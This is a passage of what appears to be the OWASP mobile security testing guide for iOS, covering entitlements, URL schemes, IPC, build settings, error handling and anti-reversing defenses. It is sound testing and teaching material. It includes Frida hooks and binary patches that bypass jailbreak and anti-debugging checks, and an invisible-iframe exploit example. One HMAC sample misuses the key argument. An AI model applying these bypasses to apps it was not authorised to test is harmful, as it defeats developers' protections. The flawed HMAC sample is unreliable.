).For example, if you want to set the \"Default Data Protection\" capability, you would need to go to the Capabilities tab in Xcode and enable Data Protection. This is directly written by Xcode to the <appname>.entitlements
file as the com.apple.developer.default-data-protection
entitlement with default value NSFileProtectionComplete
. In the IPA we might find this in the embedded.mobileprovision
as:
<key>Entitlements</key>\n<dict>\n ...\n <key>com.apple.developer.default-data-protection</key>\n <string>NSFileProtectionComplete</string>\n</dict>\n
For other capabilities such as HealthKit, the user has to be asked for permission, therefore it is not enough to add the entitlements, special keys and strings have to be added to the Info.plist
file of the app.
Purpose strings or _usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
If linking on or after iOS 10, developers are required to include purpose strings in their app's Info.plist
file. Otherwise, if the app attempts to access protected data or resources without having provided the corresponding purpose string, the access will fail and the app might even crash.
For an overview of the different purpose strings Info.plist keys available see Table 1-2 at the Apple App Programming Guide for iOS. Click on the provided links to see the full description of each key in the CocoaKeys reference.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#code-signing-entitlements-file","title":"Code Signing Entitlements File","text":"Certain capabilities require a code signing entitlements file (<appname>.entitlements
). It is automatically generated by Xcode but may be manually edited and/or extended by the developer as well.
Here is an example of entitlements file of the open source app Telegram including the App Groups entitlement (application-groups
):
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n...\n <key>com.apple.security.application-groups</key>\n <array>\n <string>group.ph.telegra.Telegraph</string>\n </array>\n</dict>\n...\n</plist>\n
The entitlement outlined above does not require any additional permissions from the user. However, it is always a good practice to check all entitlements, as the app might overask the user in terms of permissions and thereby leak information.
As documented at Apple Developer Documentation, the App Groups entitlement is required to share information between different apps through IPC or a shared file container, which means that data can be shared on the device directly between the apps. This entitlement is also required if an app extension requires to share information with its containing app.
Depending on the data to-be-shared it might be more appropriate to share it using another method such as through a backend where this data could be potentially verified, avoiding tampering by e.g. the user themselves.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#inter-process-communication-ipc","title":"Inter-Process Communication (IPC)","text":"During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
In contrast to Android's rich Inter-Process Communication (IPC) capability, iOS offers some rather limited options for communication between apps. In fact, there's no way for apps to communicate directly. In this section we will present the different types of indirect communication offered by iOS and how to test them. Here's an overview:
Custom URL schemes allow apps to communicate via a custom protocol. An app must declare support for the schemes and handle incoming URLs that use those schemes.
Apple warns about the improper use of custom URL schemes in the Apple Developer Documentation:
URL schemes offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow other apps to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
They also suggest using universal links instead, if the purpose is to implement deep linking:
While custom URL schemes are an acceptable form of deep linking, universal links are strongly recommended as a best practice.
Supporting a custom URL scheme is done by:
Security issues arise when an app processes calls to its URL scheme without properly validating the URL and its parameters and when users aren't prompted for confirmation before triggering an important action.
One example is the following bug in the Skype Mobile app, discovered in 2010: The Skype app registered the skype://
protocol handler, which allowed other apps to trigger calls to other Skype users and phone numbers. Unfortunately, Skype didn't ask users for permission before placing the calls, so any app could call arbitrary numbers without the user's knowledge. Attackers exploited this vulnerability by putting an invisible <iframe src=\"skype://xxx?call\"></iframe>
(where xxx
was replaced by a premium number), so any Skype user who inadvertently visited a malicious website called the premium number.
As a developer, you should carefully validate any URL before calling it. You can allow only certain applications which may be opened via the registered protocol handler. Prompting users to confirm the URL-invoked action is another helpful control.
All URLs are passed to the app delegate, either at launch time or while the app is running or in the background. To handle incoming URLs, the delegate should implement methods to:
More information can be found in the archived App Programming Guide for iOS and in the Apple Secure Coding Guide.
In addition, an app may also want to send URL requests (aka. queries) to other apps. This is done by:
Universal links are the iOS equivalent to Android App Links (aka. Digital Asset Links) and are used for deep linking. When tapping a universal link (to the app's website), the user will seamlessly be redirected to the corresponding installed app without going through Safari. If the app isn\u2019t installed, the link will open in Safari.
Universal links are standard web links (HTTP/HTTPS) and are not to be confused with custom URL schemes, which originally were also used for deep linking.
For example, the Telegram app supports both custom URL schemes and universal links:
tg://resolve?domain=fridadotre
is a custom URL scheme and uses the tg://
scheme.https://telegram.me/fridadotre
is a universal link and uses the https://
scheme.Both result in the same action, the user will be redirected to the specified chat in Telegram (\"fridadotre\" in this case). However, universal links give several key benefits that are not applicable when using custom URL schemes and are the recommended way to implement deep linking, according to the Apple Developer Documentation. Specifically, universal links are:
You can learn more about Universal Links in the post \"Learning about Universal Links and Fuzzing URL Schemes on iOS with Frida\" by Carlos Holguera.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#uiactivity-sharing","title":"UIActivity Sharing","text":"Starting on iOS 6 it is possible for third-party apps to share data (items) via specific mechanisms like AirDrop, for example. From a user perspective, this feature is the well-known system-wide \"Share Activity Sheet\" that appears after clicking on the \"Share\" button.
The available built-in sharing mechanisms (aka. Activity Types) include:
A full list can be found in UIActivity.ActivityType. If not considered appropriate for the app, the developers have the possibility to exclude some of these sharing mechanisms.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#app-extensions","title":"App extensions","text":"Together with iOS 8, Apple introduced App Extensions. According to Apple App Extension Programming Guide, app extensions let apps offer custom functionality and content to users while they\u2019re interacting with other apps or the system. In order to do this, they implement specific, well scoped tasks like, for example, define what happens after the user clicks on the \"Share\" button and selects some app or action, provide the content for a Today widget or enable a custom keyboard.
Depending on the task, the app extension will have a particular type (and only one), the so-called extension points. Some notable ones are:
There are three important elements here:
For example, the user selects text in the host app, clicks on the \"Share\" button and selects one \"app\" or action from the list. This triggers the app extension of the containing app. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the Apple App Extension Programming Guide which summarizes this pretty well:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#security-considerations","title":"Security Considerations","text":"From the security point of view it is important to note that:
openURL:completionHandler:
method of the NSExtensionContext
class.In addition:
When typing data into input fields, the clipboard can be used to copy in data. The clipboard is accessible system-wide and is therefore shared by apps. This sharing can be misused by malicious apps to get sensitive data that has been stored in the clipboard.
When using an app you should be aware that other apps might be reading the clipboard continuously, as the Facebook app did. Before iOS 9, a malicious app might monitor the pasteboard in the background while periodically retrieving [UIPasteboard generalPasteboard].string
. As of iOS 9, pasteboard content is accessible to apps in the foreground only, which reduces the attack surface of password sniffing from the clipboard dramatically. Still, copy-pasting passwords is a security risk you should be aware of, but also cannot be solved by an app.
The UIPasteboard
enables sharing data within an app, and from an app to other apps. There are two kinds of pasteboards:
Security Considerations:
Code signing your app assures users that the app has a known source and hasn't been modified since it was last signed. Before your app can integrate app services, be installed on a non-jailbroken device, or be submitted to the App Store, it must be signed with a certificate issued by Apple. For more information on how to request certificates and code sign your apps, review the App Distribution Guide.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"iOS applications often make use of third party libraries which accelerate development as the developer has to write less code in order to solve a problem. However, third party libraries may contain vulnerabilities, incompatible licensing, or malicious content. Additionally, it is difficult for organizations and developers to manage application dependencies, including monitoring library releases and applying available security patches.
There are three widely used package management tools: Swift Package Manager, Carthage, and CocoaPods:
There are two categories of libraries:
OHHTTPStubs
used for testing.Alamofire
.These libraries can lead to unwanted side-effects:
AFNetworking
version 2.5.1, which contained a bug that disabled certificate validation. This vulnerability would allow attackers to execute man-in-the-middle attacks against apps that are using the library to connect to their APIs.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"iOS applications have various ways to run into memory corruption bugs: first there are the native code issues which have been mentioned in the general Memory Corruption Bugs section. Next, there are various unsafe operations with both Objective-C and Swift to actually wrap around native code which can create issues. Last, both Swift and Objective-C implementations can result in memory leaks due to retaining objects which are no longer in use.
Learn more:
Detecting the presence of binary protection mechanisms heavily depends on the language used for developing the application.
Although Xcode enables all binary security features by default, it may be relevant to verify this for old applications or to check for compiler flag misconfigurations. The following features are applicable:
MH_EXECUTE
).MH_DYLIB
).Learn more:
Tests to detect the presence of these protection mechanisms heavily depend on the language used for developing the application. For example, existing techniques for detecting the presence of stack canaries do not work for pure Swift apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#xcode-project-settings","title":"Xcode Project Settings","text":""},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#stack-canary-protection","title":"Stack Canary protection","text":"Steps for enabling stack canary protection in an iOS application:
Steps for building an iOS application as PIE:
ARC is automatically enabled for Swift apps by the swiftc
compiler. However, for Objective-C apps you'll have to ensure that it's enabled by following these steps:
See the Technical Q&A QA1788 Building a Position Independent Executable.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debuggable-apps","title":"Debuggable Apps","text":"Apps can be made debuggable by adding the get-task-allow
key to the app entitlements file and setting it to true
.
While debugging is a useful feature when developing an app, it has to be turned off before releasing apps to the App Store or within an enterprise program. To do that you need to determine the mode in which your app is to be generated to check the flags in the environment:
As a good practice, as little explanatory information as possible should be provided with a compiled binary. The presence of additional metadata such as debug symbols might provide valuable information about the code, e.g. function names leaking information about what a function does. This metadata is not required to execute the binary and thus it is safe to discard it for the release build, which can be done by using proper compiler configurations. As a tester you should inspect all binaries delivered with the app and ensure that no debugging symbols are present (at least those revealing any valuable information about the code).
When an iOS application is compiled, the compiler generates a list of debug symbols for each binary file in an app (the main app executable, frameworks, and app extensions). These symbols include class names, global variables, and method and function names which are mapped to specific files and line numbers where they're defined. Debug builds of an app place the debug symbols in a compiled binary by default, while release builds of an app place them in a companion Debug Symbol file (dSYM) to reduce the size of the distributed app.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debugging-code-and-error-logging","title":"Debugging Code and Error Logging","text":"To speed up verification and get a better understanding of errors, developers often include debugging code, such as verbose logging statements (using NSLog
, println
, print
, dump
, and debugPrint
) about responses from their APIs and about their application's progress and/or state. Furthermore, there may be debugging code for \"management-functionality\", which is used by developers to set the application's state or mock responses from an API. Reverse engineers can easily use this information to track what's happening with the application. Therefore, debugging code should be removed from the application's release version.
Exceptions often occur after an application enters an abnormal or erroneous state. Testing exception handling is about making sure that the application will handle the exception and get into a safe state without exposing any sensitive information via its logging mechanisms or the UI.
Bear in mind that exception handling in Objective-C is quite different from exception handling in Swift. Bridging the two approaches in an application that is written in both legacy Objective-C code and Swift code can be problematic.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#exception-handling-in-objective-c","title":"Exception Handling in Objective-C","text":"Objective-C has two types of errors:
NSException:
NSException
is used to handle programming and low-level errors (e.g., division by 0 and out-of-bounds array access). An NSException
can either be raised by raise
or thrown with @throw
. Unless caught, this exception will invoke the unhandled exception handler, with which you can log the statement (logging will halt the program). @catch
allows you to recover from the exception if you're using a @try
-@catch
-block:
@try {\n //do work here\n }\n\n@catch (NSException *e) {\n //recover from exception\n}\n\n@finally {\n //cleanup\n
Bear in mind that using NSException
comes with memory management pitfalls: you need to clean up allocations from the try block that are in the finally block. Note that you can promote NSException
objects to NSError
by instantiating an NSError
in the @catch
block.
NSError:
NSError
is used for all other types of errors. Some Cocoa framework APIs provide errors as objects in their failure callback in case something goes wrong; those that don't provide them pass a pointer to an NSError
object by reference. It is a good practice to provide a BOOL
return type to the method that takes a pointer to an NSError
object to indicate success or failure. If there's a return type, make sure to return nil
for errors. If NO
or nil
is returned, it allows you to inspect the error/reason for failure.
Exception handling in Swift (2 - 5) is quite different. The try-catch block is not there to handle NSException
. The block is used to handle errors that conform to the Error
(Swift 3) or ErrorType
(Swift 2) protocol. This can be challenging when Objective-C and Swift code are combined in an application. Therefore, NSError
is preferable to NSException
for programs written in both languages. Furthermore, error-handling is opt-in in Objective-C, but throws
must be explicitly handled in Swift. To convert error-throwing, look at the Apple documentation. Methods that can throw errors use the throws
keyword. The Result
type represents a success or failure, see Result, How to use Result in Swift 5 and The power of Result types in Swift. There are four ways to handle errors in Swift:
do-catch
; there's only a throw
throwing the actual error or a try
to execute the method that throws. The method containing the try
also requires the throws
keyword:func dosomething(argumentx:TypeX) throws {\n try functionThatThrows(argumentx: argumentx)\n}\n
do-catch
statement. You can use the following pattern:func doTryExample() {\n do {\n try functionThatThrows(number: 203)\n } catch NumberError.lessThanZero {\n // Handle number is less than zero\n } catch let NumberError.tooLarge(delta) {\n // Handle number is too large (with delta value)\n } catch {\n // Handle any other errors\n }\n}\n\nenum NumberError: Error {\n case lessThanZero\n case tooLarge(Int)\n case tooSmall(Int)\n}\n\nfunc functionThatThrows(number: Int) throws -> Bool {\n if number < 0 {\n throw NumberError.lessThanZero\n } else if number < 10 {\n throw NumberError.tooSmall(10 - number)\n } else if number > 100 {\n throw NumberError.tooLarge(100 - number)\n } else {\n return true\n }\n}\n
let x = try? functionThatThrows()\n // In this case the value of x is nil in case of an error.\n
try!
expression to assert that the error won't occur.Result
return:enum ErrorType: Error {\n case typeOne\n case typeTwo\n}\n\nfunc functionWithResult(param: String?) -> Result<String, ErrorType> {\n guard let value = param else {\n return .failure(.typeOne)\n }\n return .success(value)\n}\n\nfunc callResultFunction() {\n let result = functionWithResult(param: \"OWASP\")\n\n switch result {\n case let .success(value):\n // Handle success\n case let .failure(error):\n // Handle failure (with error)\n }\n}\n
Result
type:struct MSTG: Codable {\n var root: String\n var plugins: [String]\n var structure: MSTGStructure\n var title: String\n var language: String\n var description: String\n}\n\nstruct MSTGStructure: Codable {\n var readme: String\n}\n\nenum RequestError: Error {\n case requestError(Error)\n case noData\n case jsonError\n}\n\nfunc getMSTGInfo() {\n guard let url = URL(string: \"https://raw.githubusercontent.com/OWASP/owasp-mastg/master/book.json\") else {\n return\n }\n\n request(url: url) { result in\n switch result {\n case let .success(data):\n // Handle success with MSTG data\n let mstgTitle = data.title\n let mstgDescription = data.description\n case let .failure(error):\n // Handle failure\n switch error {\n case let .requestError(error):\n // Handle request error (with error)\n case .noData:\n // Handle no data received in response\n case .jsonError:\n // Handle error parsing JSON\n }\n }\n }\n}\n\nfunc request(url: URL, completion: @escaping (Result<MSTG, RequestError>) -> Void) {\n let task = URLSession.shared.dataTask(with: url) { data, _, error in\n if let error = error {\n return completion(.failure(.requestError(error)))\n } else {\n if let data = data {\n let decoder = JSONDecoder()\n guard let response = try? decoder.decode(MSTG.self, from: data) else {\n return completion(.failure(.jsonError))\n }\n return completion(.success(response))\n }\n }\n }\n task.resume()\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/","title":"iOS Anti-Reversing Defenses","text":""},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":"This chapter covers defense-in-depth measures recommended for apps that process, or give access to, sensitive data or functionality. Research shows that many App Store apps often include these measures.
These measures should be applied as needed, based on an assessment of the risks caused by unauthorized tampering with the app and/or reverse engineering of the code.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#jailbreak-detection","title":"Jailbreak Detection","text":"Jailbreak detection mechanisms are added to reverse engineering defense to make running the app on a jailbroken device more difficult. This blocks some of the tools and techniques reverse engineers like to use. Like most other types of defense, jailbreak detection is not very effective by itself, but scattering checks throughout the app's source code can improve the effectiveness of the overall anti-tampering scheme.
You can learn more about Jailbreak/Root Detection in the research study \"Jailbreak/Root Detection Evasion Study on iOS and Android\" by Dana Geist and Marat Nigmatullin.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#common-jailbreak-detection-checks","title":"Common Jailbreak Detection Checks","text":"Here we present three typical jailbreak detection techniques:
File-based Checks:
The app might be checking for files and directories typically associated with jailbreaks, such as:
/Applications/Cydia.app\n/Applications/FakeCarrier.app\n/Applications/Icy.app\n/Applications/IntelliScreen.app\n/Applications/MxTube.app\n/Applications/RockApp.app\n/Applications/SBSettings.app\n/Applications/WinterBoard.app\n/Applications/blackra1n.app\n/Library/MobileSubstrate/DynamicLibraries/LiveClock.plist\n/Library/MobileSubstrate/DynamicLibraries/Veency.plist\n/Library/MobileSubstrate/MobileSubstrate.dylib\n/System/Library/LaunchDaemons/com.ikey.bbot.plist\n/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist\n/bin/bash\n/bin/sh\n/etc/apt\n/etc/ssh/sshd_config\n/private/var/lib/apt\n/private/var/lib/cydia\n/private/var/mobile/Library/SBSettings/Themes\n/private/var/stash\n/private/var/tmp/cydia.log\n/var/tmp/cydia.log\n/usr/bin/sshd\n/usr/libexec/sftp-server\n/usr/libexec/ssh-keysign\n/usr/sbin/sshd\n/var/cache/apt\n/var/lib/apt\n/var/lib/cydia\n/usr/sbin/frida-server\n/usr/bin/cycript\n/usr/local/bin/cycript\n/usr/lib/libcycript.dylib\n/var/log/syslog\n
Checking File Permissions:
The app might be trying to write to a location that's outside the application's sandbox. For instance, it may attempt to create a file in the /private
directory. If the file is created successfully, the app can assume that the device has been jailbroken.
do {\n let pathToFileInRestrictedDirectory = \"/private/jailbreak.txt\"\n try \"This is a test.\".write(toFile: pathToFileInRestrictedDirectory, atomically: true, encoding: String.Encoding.utf8)\n try FileManager.default.removeItem(atPath: pathToFileInRestrictedDirectory)\n // Device is jailbroken\n} catch {\n // Device is not jailbroken\n}\n
Checking Protocol Handlers:
The app might be attempting to call well-known protocol handlers such as cydia://
(available by default after installing Cydia).
if let url = URL(string: \"cydia://package/com.example.package\"), UIApplication.shared.canOpenURL(url) {\n // Device is jailbroken\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#automated-jailbreak-detection-bypass","title":"Automated Jailbreak Detection Bypass","text":"The quickest way to bypass common Jailbreak detection mechanisms is objection. You can find the implementation of the jailbreak bypass in the jailbreak.ts script.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#manual-jailbreak-detection-bypass","title":"Manual Jailbreak Detection Bypass","text":"If the automated bypasses aren't effective you need to get your hands dirty and reverse engineer the app binaries until you find the pieces of code responsible for the detection and either patch them statically or apply runtime hooks to disable them.
Step 1: Reverse Engineering:
When you need to reverse engineer a binary looking for jailbreak detection, the most obvious way is to search for known strings, such as \"jail\" or \"jailbreak\". Note that this won't always be effective, especially when resilience measures are in place or simply when the developer has avoided such obvious terms.
Example: Download the Damn Vulnerable iOS application (DVIA-v2), unzip it, load the main binary into radare2 and wait for the analysis to complete.
r2 -A ./DVIA-v2-swift/Payload/DVIA-v2.app/DVIA-v2\n
Now you can list the binary's symbols using the is
command and apply a case-insensitive grep (~+
) for the string \"jail\".
[0x1001a9790]> is~+jail\n...\n2230 0x001949a8 0x1001949a8 GLOBAL FUNC 0 DVIA_v2.JailbreakDetectionViewController.isJailbroken.allocator__Bool\n7792 0x0016d2d8 0x10016d2d8 LOCAL FUNC 0 +[JailbreakDetection isJailbroken]\n...\n
As you can see, there's an instance method with the signature -[JailbreakDetectionVC isJailbroken]
.
Step 2: Dynamic Hooks:
Now you can use Frida to bypass jailbreak detection by performing the so-called early instrumentation, that is, by replacing function implementation right at startup.
Use frida-trace
on your host computer:
frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]\"\n
This will start the app, trace calls to -[JailbreakDetectionVC isJailbroken]
, and create a JavaScript hook for each matching element. Open ./__handlers__/__JailbreakDetectionVC_isJailbroken_.js
with your favourite editor and edit the onLeave
callback function. You can simply replace the return value using retval.replace()
to always return 0
:
onLeave: function (log, retval, state) {\n console.log(\"Function [JailbreakDetectionVC isJailbroken] originally returned:\"+ retval);\n retval.replace(0); \n console.log(\"Changing the return value to:\"+retval);\n}\n
This will provide the following output:
$ frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]:\"\n\nInstrumenting functions... `...\n-[JailbreakDetectionVC isJailbroken]: Loaded handler at \"./__handlers__/__JailbreakDetectionVC_isJailbroken_.js\"\nStarted tracing 1 function. Press Ctrl+C to stop.\n\nFunction [JailbreakDetectionVC isJailbroken] originally returned:0x1\nChanging the return value to:0x0\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging-detection","title":"Anti-Debugging Detection","text":"Exploring applications using a debugger is a very powerful technique during reversing. You can not only track variables containing sensitive data and modify the control flow of the application, but also read and modify memory and registers.
There are several anti-debugging techniques applicable to iOS which can be categorized as preventive or as reactive. When properly distributed throughout the app, these techniques act as a supportive measure to increase the overall resilience.
As seen in chapter \"Tampering and Reverse Engineering on iOS\", the iOS XNU kernel implements a ptrace
system call that's lacking most of the functionality required to properly debug a process (e.g. it allows attaching/stepping but not read/write of memory and registers).
Nevertheless, the iOS implementation of the ptrace
syscall contains a nonstandard and very useful feature: preventing the debugging of processes. This feature is implemented as the PT_DENY_ATTACH
request, as described in the official BSD System Calls Manual. In simple words, it ensures that no other debugger can attach to the calling process; if a debugger attempts to attach, the process will terminate. Using PT_DENY_ATTACH
is a fairly well-known anti-debugging technique, so you may encounter it often during iOS pentests.
Before diving into the details, it is important to know that ptrace
is not part of the public iOS API. Non-public APIs are prohibited, and the App Store may reject apps that include them. Because of this, ptrace
is not directly called in the code; it's called when a ptrace
function pointer is obtained via dlsym
.
The following is an example implementation of the above logic:
#import <dlfcn.h>\n#import <sys/types.h>\n#import <stdio.h>\ntypedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);\nvoid anti_debug() {\n ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, \"ptrace\");\n ptrace_ptr(31, 0, 0, 0); // PT_DENY_ATTACH = 31\n}\n
Bypass: To demonstrate how to bypass this technique we'll use an example of a disassembled binary that implements this approach:
Let's break down what's happening in the binary. dlsym
is called with ptrace
as the second argument (register R1). The return value in register R0 is moved to register R6 at offset 0x1908A. At offset 0x19098, the pointer value in register R6 is called using the BLX R6 instruction. To disable the ptrace
call, we need to replace the instruction BLX R6
(0xB0 0x47
in Little Endian) with the NOP
(0x00 0xBF
in Little Endian) instruction. After patching, the code will be similar to the following:
Armconverter.com is a handy tool for conversion between bytecode and instruction mnemonics.
Bypasses for other ptrace-based anti-debugging techniques can be found in \"Defeating Anti-Debug Techniques: macOS ptrace variants\" by Alexander O'Mara.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#using-sysctl","title":"Using sysctl","text":"Another approach to detecting a debugger that's attached to the calling process involves sysctl
. According to the Apple documentation, it allows processes to set system information (if having the appropriate privileges) or simply to retrieve system information (such as whether or not the process is being debugged). However, note that just the fact that an app uses sysctl
might be an indicator of anti-debugging controls, though this won't always be the case.
The Apple Documentation Archive includes an example which checks the info.kp_proc.p_flag
flag returned by the call to sysctl
with the appropriate parameters. According to Apple, you shouldn't use this code unless it's for the debug build of your program.
Bypass: One way to bypass this check is by patching the binary. When the code above is compiled, the disassembled version of the second half of the code is similar to the following:
After the instruction at offset 0xC13C, MOVNE R0, #1
is patched and changed to MOVNE R0, #0
(0x00 0x20 in bytecode), the patched code is similar to the following:
You can also bypass a sysctl
check by using the debugger itself and setting a breakpoint at the call to sysctl
. This approach is demonstrated in iOS Anti-Debugging Protections #2.
Applications on iOS can detect if they have been started by a debugger by checking their parent PID. Normally, an application is started by the launchd process, which is the first process running in the user mode and has PID=1. However, if a debugger starts an application, we can observe that getppid
returns a PID different than 1
. This detection technique can be implemented in native code (via syscalls), using Objective-C or Swift as shown here:
func AmIBeingDebugged() -> Bool {\n return getppid() != 1\n}\n
Bypass: Similarly to the other techniques, this also has a trivial bypass (e.g. by patching the binary or by using Frida hooks).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#file-integrity-checks","title":"File Integrity Checks","text":"There are two common approaches to check file integrity: using application source code integrity checks and using file storage integrity checks.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#application-source-code-integrity-checks","title":"Application Source Code Integrity Checks","text":"In the \"Tampering and Reverse Engineering on iOS\" chapter, we discussed the iOS IPA application signature check. We also saw that determined reverse engineers can bypass this check by re-packaging and re-signing an app using a developer or enterprise certificate. One way to make this harder is to add a custom check that determines whether the signatures still match at runtime.
Apple takes care of integrity checks with DRM. However, additional controls (such as in the example below) are possible. The mach_header
is parsed to calculate the start of the instruction data, which is used to generate the signature. Next, the signature is compared to the given signature. Make sure that the generated signature is stored or coded somewhere else.
int xyz(char *dst) {\n const struct mach_header * header;\n Dl_info dlinfo;\n\n if (dladdr(xyz, &dlinfo) == 0 || dlinfo.dli_fbase == NULL) {\n NSLog(@\" Error: Could not resolve symbol xyz\");\n [NSThread exit];\n }\n\n while(1) {\n\n header = dlinfo.dli_fbase; // Pointer on the Mach-O header\n struct load_command * cmd = (struct load_command *)(header + 1); // First load command\n // Now iterate through load command\n //to find __text section of __TEXT segment\n for (uint32_t i = 0; cmd != NULL && i < header->ncmds; i++) {\n if (cmd->cmd == LC_SEGMENT) {\n // __TEXT load command is a LC_SEGMENT load command\n struct segment_command * segment = (struct segment_command *)cmd;\n if (!strcmp(segment->segname, \"__TEXT\")) {\n // Stop on __TEXT segment load command and go through sections\n // to find __text section\n struct section * section = (struct section *)(segment + 1);\n for (uint32_t j = 0; section != NULL && j < segment->nsects; j++) {\n if (!strcmp(section->sectname, \"__text\"))\n break; //Stop on __text section load command\n section = (struct section *)(section + 1);\n }\n // Get here the __text section address, the __text section size\n // and the virtual memory address so we can calculate\n // a pointer on the __text section\n uint32_t * textSectionAddr = (uint32_t *)section->addr;\n uint32_t textSectionSize = section->size;\n uint32_t * vmaddr = segment->vmaddr;\n char * textSectionPtr = (char *)((int)header + (int)textSectionAddr - (int)vmaddr);\n // Calculate the signature of the data,\n // store the result in a string\n // and compare to the original one\n unsigned char digest[CC_MD5_DIGEST_LENGTH];\n CC_MD5(textSectionPtr, textSectionSize, digest); // calculate the signature\n for (int i = 0; i < sizeof(digest); i++) // fill signature\n sprintf(dst + (2 * i), \"%02x\", digest[i]);\n\n // return strcmp(originalSignature, signature) == 0; // verify signatures match\n\n return 0;\n }\n }\n cmd = (struct load_command *)((uint8_t *)cmd + 
cmd->cmdsize);\n }\n }\n\n}\n
Bypass:
Apps might choose to ensure the integrity of the application storage itself, by creating an HMAC or signature over either a given key-value pair or a file stored on the device, e.g. in the Keychain, UserDefaults
/NSUserDefaults
, or any database.
For example, an app might contain the following code to generate an HMAC with CommonCrypto
:
// Allocate a buffer to hold the digest and perform the digest.\n NSMutableData* actualData = [getData];\n //get the key from the keychain\n NSData* key = [getKey];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n [actualData appendData: digestBuffer];\n
This script performs the following steps:
NSMutableData
.After that, it might be verifying the HMACs by doing the following:
NSData* hmac = [data subdataWithRange:NSMakeRange(data.length - CC_SHA256_DIGEST_LENGTH, CC_SHA256_DIGEST_LENGTH)];\n NSData* actualData = [data subdataWithRange:NSMakeRange(0, (data.length - hmac.length))];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n return [hmac isEqual: digestBuffer];\n
NSData
.NSData
.Note: if the app also encrypts files, make sure that it encrypts and then calculates the HMAC as described in Authenticated Encryption.
Bypass:
The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a jailbroken device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide and also in the real world. Other tools, such as Cydia Substrate or Cycript, can be detected similarly. Note that injection, hooking and DBI (Dynamic Binary Instrumentation) tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
Bypass:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the chapter \"Tampering and Reverse Engineering on iOS\" for examples of patching and code injection.
